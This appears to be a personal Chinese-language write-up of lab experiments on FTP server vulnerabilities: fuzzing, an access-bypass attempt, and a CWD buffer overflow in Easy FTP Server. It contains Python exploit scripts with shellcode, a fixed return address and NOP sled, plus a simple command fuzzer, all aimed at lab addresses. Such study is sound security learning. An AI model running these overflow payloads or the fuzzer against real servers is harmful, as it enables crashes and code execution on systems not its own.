FTP的漏洞挖掘
FTP协议简介
漏洞挖掘手记1:DOS
原理是对FTP协议中的命令及命令参数进行脏数据替换,构造畸形FTP命令并发送给被测试FTP服务程序。
下了一个FTPFuzz,界面丑绝人寰
开启Quick ‘n Easy FTP Server
开启后,做实验并没有崩溃,不能触发DOS攻击。可能和SP3有关
漏洞挖掘手记2:访问权限
在WIN7中开启CompleteFTP Server
登陆不了,新建个账户吧
FTP 目录在本地系统中的“/Home/user”
所以这就绕过了?
easyFTP 缓冲区溢出漏洞
Easy FTP Server执行CWD时未对参数进行长度有效性校验,传递超长参数会造成缓冲区溢出。
启动easyFTP,开启后生成三个XML配置文件和一个文件夹
连上OD,按F9继续运行
实验失败:
代码如下:
import socket
import sys


def ftp_test(ip,port):
    """Python 2 test harness (print statements, str payloads) for the CWD case described above.

    Connects to ip:port, logs in anonymously and sends a single CWD with an
    oversized argument.  The only thing reported is whether the control
    connection still answers afterwards.  This is the listing the notes
    record as not working.
    """
    target = ip
    port = port
    # Payload bytes reproduced from the notes as-is; not decoded or verified here.
    shellcode = ('\x50\x20'
                 '\xD9\xEE'
                 '\xD9\x74\x24\xF4'
                 '\x58'
                 '\x83\xC0\x1b'
                 '\x33\xC9'
                 '\x8A\x1C\x08'
                 '\x80\xF3\x11'
                 '\x88\x1C\x08'
                 '\x41'
                 '\x80\xFB\x90'
                 '\x75\xF1'
                 '\xed\x79\x7b\x1b\x29\x0f\x79\x72\x98\xc0\x5e\x79\x23\x65\x80\x1d'
                 '\x9a\xe5\x9c\x6f\xe5\x22\xca\xa6\x15\x3a\xf2\x77\xaa\x22\x23\x42'
                 '\x79\x64\x62\x74\x63\x45\x22\xc3\x75\x9a\x4b\x21\x9a\x5a\x1d\x9a'
                 '\x58\x0d\x9a\x18\x9a\x78\x19\xbc\x2c\x7b\x1b\x29\x0f\x64\x14\x84'
                 '\xee\x46\xe9\x84\x71\x9a\x54\x2d\x9a\x5d\x14\x69\x12\xdc\x9a\x48'
                 '\x31\x12\xcc\x22\xee\x56\x9a\x25\xaa\x12\xe4\x88\x1e\xaf\x17\x2b'
                 '\xd5\x65\x19\xd0\xdb\x16\x12\xc1\x57\xfa\xe0\x2a\x45\x35\x0d\x64'
                 '\xf5\x9a\x48\x35\x12\xcc\x77\x9a\x2d\x6a\x9a\x48\x0d\x12\xcc\x12'
                 '\x3d\xaa\x84\x4e\xba\x46\x70\x2c\x7b\x1b\x29\x0f\x64\xb8\x22\xca'
                 '\x42\x79\x75\x70\x21\x32\x79\x32\x41\x70\x7f\x9a\xd5\x42\x41\x41'
                 '\x42\xee\x46\xed\x42\xee\x46\xe9\x81')
    # 268 matches the filler length used by the later listings on this page;
    # 198 is presumably the shellcode length — neither is recomputed here.
    buffer = shellcode+'a'*(268-198)+'\xa0\x6f\x5f\x7d'
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((target,port))
        print "[+] Connected!"
    except:  # bare except: also swallows KeyboardInterrupt/SystemExit
        print "[!] Connection failed!"
        sys.exit(0)
    s.recv(1024)  # consume the 220 banner
    s.send('USER anonymouss\r\n')
    s.recv(1024)
    s.send('PASS anonymous\r\n')
    s.recv(1024)
    print "[+] Sending buffer..."
    # Verb and argument are concatenated with no separator here; the notes
    # further down attribute this run's failure to that missing space.
    s.send('CWD' + buffer + '\r\n')
    try:
        # recv() returns '' on an orderly close without raising; only a socket
        # error (e.g. a reset) reaches the except branch.
        s.recv(1024)
        print "failed"  # server still answered / closed cleanly
    except:
        print "ok"      # recv raised -> connection dropped
    s.close()

if __name__ == '__main__':
    ftp_test("192.168.211.129", 21)
转去网上搜索别人的代码,他人代码用到的是 pwntools 包,在 Windows 上安装不了,我笑了。呵呵哒。此处贴上他人的利用代码:
# Third-party (pwntools) version of the same test, copied from another
# write-up; Python 2 print syntax.  The notes say pwntools did not install
# on the author's Windows machine, so this listing was not run as-is.
from pwn import *

p = remote("192.168.253.156", 21)
# Hard-coded address; the notes say it is tied to one specific Windows build.
jmp_esp = 0x7E429353
shellcode = "\x33\xDB\x53\x68\x6E\x63\x68\x21\x68\x74\x62\x72\x61\x68\x67\x69\x61\x6E\x8B\xC4\x53\x50\x50\x53\xB8\xEA\x07\x45\x7E\xFF\xD0"
nop = "\x90" * 12
# p32() packs the address as four little-endian bytes.
payload = 'a' * 268 + p32(jmp_esp) + nop + shellcode
print p.recv(1024)  # banner
p.sendline("USER anonymous")
print p.recv(1024)
p.sendline("PASS anonymous")
print p.recv(1024)
p.sendline("CWD " + payload)  # note the space after the verb
p.interactive()
继续接着做实验,成功。排查原因:代码少写了一个空格。所以此处提醒大家,注意细节。
执行CWD命令后发生缓冲区溢出,直接找CWD命令,使用OD查找ws2_32.Rev,但是怎么找呢?用IDA(不会用啊,感觉又得恶补一下了)?每天问别人,今天先把攻击的代码写了。
此处暂停
此处修改为jmp esi
中文版xp用不了
贴上最终代码
import socket
import sys
import time


def ftp_test(ip,port):
    """Final version of the Python 2 test from the notes.

    Same flow as the first listing on this page: connect, anonymous login,
    one CWD with an oversized argument, then report whether the control
    connection still answers.  Differences from the first listing: the verb
    is followed by a space, a sleep replaces reading the banner, and the reply
    after the CWD (if any) is printed.
    """
    target = ip
    port = port
    # Assigned but not referenced below; the address bytes are written out
    # literally in `buffer`.  Notes say the address is specific to one
    # Windows build (did not work on the Chinese XP the author tried).
    jmp_esp = 0x7E429353
    shellcode = "\x33\xDB\x53\x68\x6E\x63\x68\x21\x68\x74\x62\x72\x61\x68\x67\x69\x61\x6E\x8B\xC4\x53\x50\x50\x53\xB8\xEA\x07\x45\x7E\xFF\xD0"
    nop = "\x90" * 12
    buffer = 'a' * 268 + '\x53\x93\x52\x7E' + nop + shellcode
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((target,port))
        print "[+] Connected!"
    except:  # bare except: also swallows KeyboardInterrupt/SystemExit
        print "[!] Connection failed!"
        sys.exit(0)
    # The 220 banner is never read, so the first recv below may return it
    # together with the USER reply.
    time.sleep(1)
    s.send('USER anonymous\r\n')
    s.recv(1024)
    s.send('PASS anonymous\r\n')
    s.recv(1024)
    print "[+] Sending buffer..."
    s.send('CWD ' + buffer + '\r\n')
    try:
        # recv() returns '' on an orderly close without raising; only a socket
        # error reaches the except branch.
        h = s.recv(1024)
        print h
        print "failed"  # server still answered / closed cleanly
    except:
        print "ok"      # recv raised -> connection dropped
    s.close()

if __name__ == '__main__':
    ftp_test("192.168.211.129", 21)
Fuzz DIY
# -*- coding: utf-8 -*-
# @Date    : 2017-02-19 21:44:12
# @Author  : giantbranch (giantbranch@gmail.com)
# @Link    : http://blog.csdn.net/u012763794?viewmode=contents
# @Link    : http://www.giantbranch.cn/
#
# Minimal FTP command fuzzer (Python 2): logs in anonymously, then either
# sends each verb in `fuzzcmd` with long filler arguments (mode 1) or probes
# two "cd .." forms (mode 2).  The indentation of the original was lost in
# the paste; the try/except after the sends is placed inside the loop here,
# which is the most natural reading.

import sys
import socket

buffer = 'a' * 4
fuzzcmd = ['mdelete', 'cd', 'mkdir', 'delete', 'cwd', 'mdir', 'mput', 'mls', 'rename', 'site index' ]

if len(sys.argv) != 4:
    print "[*] Please input like this: python fuzzFtp.py 192.168.253.151 21 1"
    sys.exit(0)

target = sys.argv[1]
port = int(sys.argv[2])
mode = int(sys.argv[3])

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    print target
    print port
    con = s.connect((target, port))  # connect() returns None; `con` is unused
    print "[*] Connected!"
except:  # bare except: also swallows KeyboardInterrupt/SystemExit
    print "[*] Connect failed!"
    sys.exit(0)

# Consume the welcome banner
s.recv(1024)
s.send("USER anonymous\r\n")
s.recv(1024)
s.send("PASS anonymous\r\n")
s.recv(1024)

j = 100
if mode ==1:
    print "[*] Sending payload..."
    for i in fuzzcmd:
        # Argument lengths: 400, 1600, 3200, 16000 bytes, then two short args.
        s.send(i + ' ' + buffer*j + '\r\n')
        s.send(i + ' ' + buffer*j*4 + '\r\n')
        s.send(i + ' ' + buffer*j*8 + '\r\n')
        s.send(i + ' ' + buffer*j*40 + '\r\n')
        s.send(i + ' ' + buffer + ' ' + buffer + '\r\n')
        try:
            # Only a raising recv() counts as a hit; '' from an orderly close
            # does not raise, and a hung server blocks here indefinitely.
            s.recv(1024)
            print "[!] WuWu, Failed!"
        except :
            print "[+] Yeah! Maybe you find a Bug!"

if mode == 2:
    s.send('cd ../\r\n')
    # 550 is the RFC 959 "requested action not taken" reply class.
    ds = s.recv(50).find("550")
    if ds != -1:
        print "[+] Yeah! Maybe you can cd ../!"

if mode == 2:
    # NOTE(review): '\\r\n' is a literal backslash, the letter r, then LF —
    # the CR is consumed by the escape, so this line is not CRLF-terminated.
    s.send('cd ..\\r\n')
    dss = s.recv(50).find("550")
    if dss != -1:
        print "[+] Yeah! Maybe you can cd ..\!"
运行完毕,服务端特别卡
未成功